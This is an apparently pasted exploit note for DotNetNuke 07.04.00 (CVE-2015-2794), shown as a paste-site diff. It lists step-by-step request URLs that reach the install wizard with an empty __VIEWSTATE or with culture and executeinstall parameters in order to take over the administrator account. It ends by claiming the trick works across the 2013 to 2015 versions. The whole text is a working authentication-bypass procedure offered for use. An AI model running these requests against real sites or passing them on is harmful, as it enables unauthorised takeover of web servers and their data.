View difference between Paste ID: xWQ18c8y and 2vvtMyYY
SHOW: | | - or go back to the newest paste.
1
# Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass
2
# CVE: CVE-2015-2794
3
Step 1: find Dotnetnuke ver 07.04.00
4
Step 2: /Install/InstallWizard.aspx?__VIEWSTATE=
5
Step 3: Fill all infor
6
Step 4: CLick continue if it don't work, just add &culture=en-US&executeinstall
7
or you get any error ex: 500,... just removing __VIEWSTATE=
8
Install/InstallWizard.aspx?culture=en-US&executeinstall
9
Step 5: Login /Home/tabid/36/ctl/Login/Default.aspx
10
-> This Exploit work on 2013,2014,2015 version!